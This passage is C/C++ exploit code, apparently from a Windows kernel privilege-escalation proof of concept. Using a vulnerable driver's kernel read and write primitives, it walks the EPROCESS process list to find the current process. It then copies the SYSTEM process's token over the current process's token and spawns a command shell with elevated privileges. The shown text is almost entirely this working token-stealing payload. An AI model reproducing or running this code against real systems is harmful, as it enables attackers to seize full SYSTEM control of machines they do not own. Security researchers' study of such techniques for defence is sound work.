        DWORD foundpid = 0;
        PVOID nextPid = 0;
        PVOID nextProc = sysEPROCESS;
    
        while (pid != foundpid) {
            nextProc = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
            nextProc = PVOID((uintptr_t)nextProc - Offset_ActiveProcessLinks);
            nextPid  = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
            foundpid = (DWORD)kernelRead(nextPid, hDriver);
    
            if (SysProcHead == nextProc) {
                printf("[+] Failed to find target's EPROCESS\n");
                return 1;
            }
    
        }
    
        if (nextProc == NULL) {
            printf("[-] Unable to find EPROCESS of current process!\n");
            return 1;
        }
    
        PVOID currentEPROCESS = nextProc;
        printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
    
        getchar();
    
        // Step 3
    
        PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
        printf("[+] System's EPROCESS.Token value: %p\n", sysToken);
    
        getchar();
    
        // Step 4
    
        PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
        printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);
    
        getchar();
    
        // Step 5
        PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
        newToken = (PVOID((uintptr_t)newToken | (uintptr_t)sysToken));
        printf("[+] Modified EPROCESS.Token value: %p\n", newToken);
    
        printf("[+] Attempting to overwrite current process's Token to escalate...\n");
        BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
        
        if (!status) {
            printf("[-] Failed to overwrite current process's Token value...\n");
            return 1;
        }
    
        getchar();
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
    

Reference: